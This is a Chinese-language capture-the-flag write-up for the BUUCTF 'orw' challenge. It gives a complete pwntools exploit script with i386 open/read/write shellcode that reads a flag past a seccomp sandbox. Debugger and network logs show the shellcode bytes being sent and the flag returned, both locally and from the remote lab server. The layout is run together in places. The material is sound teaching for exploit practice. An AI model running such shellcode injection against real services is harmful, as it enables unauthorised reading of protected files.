

1.题目信息 BUUCTF在线评测（下载orw时需先关闭防病毒软件） 2.题目分析
orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护，并不能getshell（沙箱通常只放行open、read、write这几个系统调用，execve等会被拦截，因此无法拿到shell）。只能通过orw的方式拿到flag。
fd = open('./flag'); # 打开flag文件，得到fd
read(fd, buf, 0x30); # 通过fd将flag的内容读到内存中
write(1, buf, 0x30); # 将内存中的flag内容输出到屏幕
在相关目录里面写入以下内容 holyeyesubuntu:/Re/6$ echo flag{testtest} > ./flag holyeyesubuntu:/Re/6$
3.解题脚本 rootpwn_test1604:/ctf/work/6# ls orw orw.i64 orw.py rootpwn_test1604:/ctf/work/6# python Python 2.7.12 (default, Nov 12 2018, 14:36:49) [GCC 5.4.0 20160609] on linux2 Type help, copyright, credits or license for more information. './flag'.encode('hex') 2e2f666c6167 './flag\x00\x00'.encode('hex') 2e2f666c61670000
3.1只用修改的内容  context.archi386DEBUG 1LOCAL True BIN ./orw HOST node5.buuoj.cn PORT 25178def exploit(p):p.recv()pl xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80p.sendline(asm(pl))p.interactive()return 3.2全部脚本  #!/usr/bin/env python

-- coding: utf-8 --from pickle import TRUE

from pwn import * import syscontext.terminal[tmux,sp,-h] context.log_leveldebug context.archi386DEBUG 1LOCAL True BIN ./orw HOST node5.buuoj.cn PORT 25178def get_base_address(proc):return int(open(/proc/{}/maps.format(proc.pid), rb).readlines()[0].split(-)[0], 16)def debug(bps,_s):script handle SIGALRM ignore\nPIE get_base_address(p)script set $_base 0x{:x}\n.format(PIE)for bp in bps:script b *0x%x\n%(PIEbp)script _sgdb.attach(p,gdbscriptscript)# pwn,caidan,leak,libc

recv recvuntil send sendline sendlineafter sendafter

#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabdef exploit(p):p.recv()pl xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80p.sendline(asm(pl))p.interactive()returnif name main:elf ELF(BIN)if len(sys.argv) 1:LOCAL Falsep remote(HOST, PORT)exploit(p)else:LOCAL Truep process(BIN)log.info(PID: str(proc.pidof(p)[0]))# pauseif DEBUG:debug([],)exploit(p) 3.3 运行本地 rootpwn_test1604:/ctf/work/6# tmux rootpwn_test1604:/ctf/work/6# python orw.py  rootpwn_test1604:/ctf/work/6# python orw.py [2525]│ f 1 f765ab23 __read_nocancel25 [0/48] [DEBUG] PLT 0x8048370 read │ f 2 8048582 main58 [DEBUG] PLT 0x8048370 read │ f 3 f759d637 __libc_start_main247 [DEBUG] PLT 0x8048380 printf │pwndbg c [DEBUG] PLT 0x8048390 __stack_chk_fail │Continuing. [DEBUG] PLT 0x80483a0 __libc_start_main │ [DEBUG] PLT 0x80483b0 prctl │Program received signal SIGSEGV, Segmentation fault. 
[DEBUG] PLT 0x80483c0 gmon_start │0x0804a0a8 in shellcode () [] /ctf/work/6/orw │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATAArch: i386-32-little │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────RELRO: Partial RELRO │ EAX 0x30Stack: Canary found │ EBX 0x1NX: NX disabled │ ECX 0xffbd74b4 ◂— 0x67616c66 (flag)PIE: No PIE (0x8048000) │ EDX 0x30RWX: Has RWX segments │ EDI 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d / 0x1b1db0 / [] Starting local process ./orw: pid 179 │ ESI 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d / 0x1b1db0 / [] PID: 179 │ EBP 0xffbd74c8 ◂— 0x0 [DEBUG] Wrote gdb script to /tmp/pwn1jT2Ys.gdb │ ESP 0xffbd74b4 ◂— 0x67616c66 (flag)file ./orw │ EIP 0x804a0a8 (shellcode72) ◂— 0xa /* \n /handle SIGALRM ignore │────────────────────────────────────────[ DISASM ]────────────────────────────────────────set $_base 0x8048000 │ ► 0x804a0a8 shellcode72 or al, byte ptr [eax] [] running in new terminal: /usr/bin/gdb -q ./orw 179 -x /tmp/pwn1jT2Ys.gdb │ 0x804a0aa shellcode74 add byte ptr [eax], al [DEBUG] Launching a new terminal: [/usr/bin/tmux, sp, -h, /usr/bin/gdb -q ./orw 1│ 0x804a0ac shellcode76 add byte ptr [eax], al 79 -x /tmp/pwn1jT2Ys.gdb] │ 0x804a0ae shellcode78 add byte ptr [eax], al [] Waiting for debugger: Done [DEBUG] Received 0x17 bytes: [0/25]│ f 1 f765ab23 __read_nocancel25 [0/48]Give my your shellcode: │ f 2 8048582 main58 [DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/inc│ f 3 f759d637 __libc_start_main247 ludes /dev/stdin │pwndbg c [DEBUG] Assembling │Continuing..section .shellcode,awx │.global _start │Program received signal SIGSEGV, Segmentation fault..global start │0x0804a0a8 in shellcode ()_start: │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATAstart: │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────.intel_syntax noprefix │ EAX 0x30xor eax, eax │ EBX 0x1xor ebx, ebx │ ECX 0xffbd74b4 ◂— 0x67616c66 
(flag)xor ecx, ecx │ EDX 0x30xor edx, edx │ EDI 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d /* 0x1b1db0 /push 0x00006761 │ ESI 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d / 0x1b1db0 /push 0x6c662f2e │ EBP 0xffbd74c8 ◂— 0x0mov eax, 5 #open(./flag) │ ESP 0xffbd74b4 ◂— 0x67616c66 (flag)mov ebx, esp │ EIP 0x804a0a8 (shellcode72) ◂— 0xa / \n /mov ecx, 0 │────────────────────────────────────────[ DISASM ]────────────────────────────────────────mov edx, 0 │ ► 0x804a0a8 shellcode72 or al, byte ptr [eax]int 0x80 │ 0x804a0aa shellcode74 add byte ptr [eax], almov ebx, eax │ 0x804a0ac shellcode76 add byte ptr [eax], almov eax, 3 #read(fd,esp,0x30) │ 0x804a0ae shellcode78 add byte ptr [eax], almov ecx, esp │ 0x804a0b0 shellcode80 add byte ptr [eax], almov edx, 0x30 │ 0x804a0b2 shellcode82 add byte ptr [eax], alint 0x80 │ 0x804a0b4 shellcode84 add byte ptr [eax], almov eax, 4 #write(1,esp,0x30) │ 0x804a0b6 shellcode86 add byte ptr [eax], almov ebx, 1 │ 0x804a0b8 shellcode88 add byte ptr [eax], almov ecx, esp │ 0x804a0ba shellcode90 add byte ptr [eax], almov edx, 0x30 │ 0x804a0bc shellcode92 add byte ptr [eax], alint 0x80 │────────────────────────────────────────[ STACK ]───────────────────────────────────────── [DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-bw_t9d/step2 /tmp/pwn-asm-bw_t9d/s│00:0000│ ecx esp 0xffbd74b4 ◂— 0x67616c66 (flag) tep1 │01:0004│ 0xffbd74b8 ◂— 0x7365747b ({tes) [DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-bw_t9d/step3 │02:0008│ 0xffbd74bc ◂— 0x73657474 (ttes) /tmp/pwn-asm-bw_t9d/step4 │03:000c│ 0xffbd74c0 ◂— 0xf70a7d74 [DEBUG] Sent 0x49 bytes: │04:0010│ 0xffbd74c4 —▸ 0xffbd74e0 ◂— 0x100000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│ │05:0014│ ebp 0xffbd74c8 ◂— 0x000000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│ │06:0018│ 0xffbd74cc —▸ 0xf759d637 (__libc_start_main247) ◂— add esp, 0x1000000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 
│····│····│····│···0│ │07:001c│ 0xffbd74d0 —▸ 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d / 000000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│ │x1b1db0 /00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│ │──────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────── 00000049 │ ► f 0 804a0a8 shellcode72 [] Switching to interactive mode │ f 1 67616c66 [DEBUG] Received 0x30 bytes: │ f 2 7365747b00000000 66 6c 61 67 7b 74 65 73 74 74 65 73 74 7d 0a f7 │flag│{tes│ttes│t}··│ │ f 3 7365747400000010 e0 74 bd ff 00 00 00 00 37 d6 59 f7 00 70 73 f7 │·t··│····│7·Y·│·ps·│ │ f 4 f70a7d7400000020 00 70 73 f7 00 00 00 00 37 d6 59 f7 01 00 00 00 │·ps·│····│7·Y·│····│ │ f 5 ffbd74e000000030 │ f 6 f759d637 __libc_start_main247 flag{testtest} │Program received signal SIGSEGV (fault address 0x30) \xff\x00\x00\x00\x007psps\x007\x00\( 3.4 运行远程 rootpwn_test1604:/ctf/work/6# python orw.py 1 rootpwn_test1604:/ctf/work/6# tmux [exited] rootpwn_test1604:/ctf/work/6# python orw.py 1 [DEBUG] PLT 0x8048370 read [DEBUG] PLT 0x8048380 printf [DEBUG] PLT 0x8048390 __stack_chk_fail [DEBUG] PLT 0x80483a0 __libc_start_main [DEBUG] PLT 0x80483b0 prctl [DEBUG] PLT 0x80483c0 __gmon_start__ [*] /ctf/work/6/orwArch: i386-32-littleRELRO: Partial RELROStack: Canary foundNX: NX disabledPIE: No PIE (0x8048000)RWX: Has RWX segments [] Opening connection to node5.buuoj.cn on port 25178: Done [DEBUG] Received 0x17 bytes:Give my your shellcode: [DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin [DEBUG] Assembling.section .shellcode,awx.global _start.global __start_start:__start:.intel_syntax noprefixxor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80 [DEBUG] 
/usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-C0CcaA/step2 /tmp/pwn-asm-C0CcaA/step1 [DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-C0CcaA/step3 /tmp/pwn-asm-C0CcaA/step4 [DEBUG] Sent 0x49 bytes:00000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│00000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│00000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 │····│····│····│···0│00000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│00000049 [*] Switching to interactive mode [DEBUG] Received 0x30 bytes:00000000 66 6c 61 67 7b 31 30 33 37 66 34 39 62 2d 33 30 │flag│{103│7f49│b-30│00000010 36 63 2d 34 30 34 32 2d 38 34 31 31 2d 34 38 34 │6c-4│042-│8411│-484│00000020 39 32 64 61 35 37 30 36 62 7d 0a f7 01 00 00 00 │92da│5706│b}··│····│00000030 flag{1037f49b-306c-4042-8411-48492da5706b} \x0[DEBUG] Received 0x2b bytes:timeout: the monitored command dumped core\n timeout: the monitored command dumped core [*] Got EOF while reading in interactive \) 3.5 避坑提醒 用kali2023的虚机环境不行要用ubuntu16.04的虚机环境就可以。